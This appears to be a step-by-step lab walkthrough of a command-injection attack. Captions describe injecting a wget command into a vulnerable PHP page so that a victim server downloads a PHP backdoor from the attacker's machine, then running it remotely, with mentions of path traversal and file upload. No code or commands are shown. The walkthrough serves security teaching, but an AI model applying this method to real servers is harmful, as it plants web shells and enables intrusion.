- Layout for this exercise:
- This exercise is based on the previous one:
http://www.whitelist1.com/2018/04/command-injection-attack.html
- In this exercise let's assume the most simple scenario, where the web server folder at the Ubuntu victim machine is readable, while in other exercises we study more complex scenarios:
- Starting XAMPP at Ubuntu:
- Also, let's check that ci.php is present at the victim side:
- ci.php is accessible from the attacker Kali Linux via web:
- Now, going to /user/share/webshells, Kali has got a bunch of prepared webshells to be used as attacking tools for different languages:
- Going to the php folder we find php-backdoor.php:
- Setting a simple HTTP server at the attacker's side:
- Checking that the wget command is available at the victim side:
- Now, the wget command is injected crafting the URL at Kali's browser (notice that 192.168.1.10 is Kali's IP):
- The transaction is successful, because php-backdoor.php is now present at the victim side:
- The simple HTTP server at Kali records the successful transaction:
- Finally, executing php-backdoor.php remotely via the browser is easy.
- Let's notice that there are several attacking options available, for instance uploading files , traversing paths, and also executing SQL injections:
- For instance, traversing to folders where comprimising files are present:
- Also, other malicious files could be uploaded, even setting the destination folder:
- The attack is successful because the malicious file has been uploaded to the victim by injecting commands to the attacker's browser:
